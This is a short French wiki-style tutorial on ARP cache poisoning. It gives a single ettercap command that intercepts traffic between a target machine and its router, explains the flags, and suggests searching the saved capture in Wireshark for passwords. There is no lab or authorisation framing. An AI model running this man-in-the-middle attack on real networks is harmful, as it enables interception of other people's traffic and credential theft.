====== ARP Cache Poisoning ====== ===== ARP Poisoning Basic ===== Voici un exemple d'utilisation d'ettercap pour faire du ARP Poisoning (mettre sudo devant pour ubuntu) : ettercap -T -q -M arp:remote /192.168.1.101/ /192.168.1.1/ -w fichier_de_sortie * -T : lance ettercap en mode texte * -q : permet de ne pas afficher les requêtes dans le terminal * -M : indique que l'on veut une attaque de type "Man in the middle" * -w : enregistre le résultat de la capture dans un fichier * 192.168.1.101 est la machine cible et 192.168.1.1 est le routeur de sortie Ensuite on ouvre le fichier généré avec wireshark par exemple et on analyse à la recherche de mots de passe :)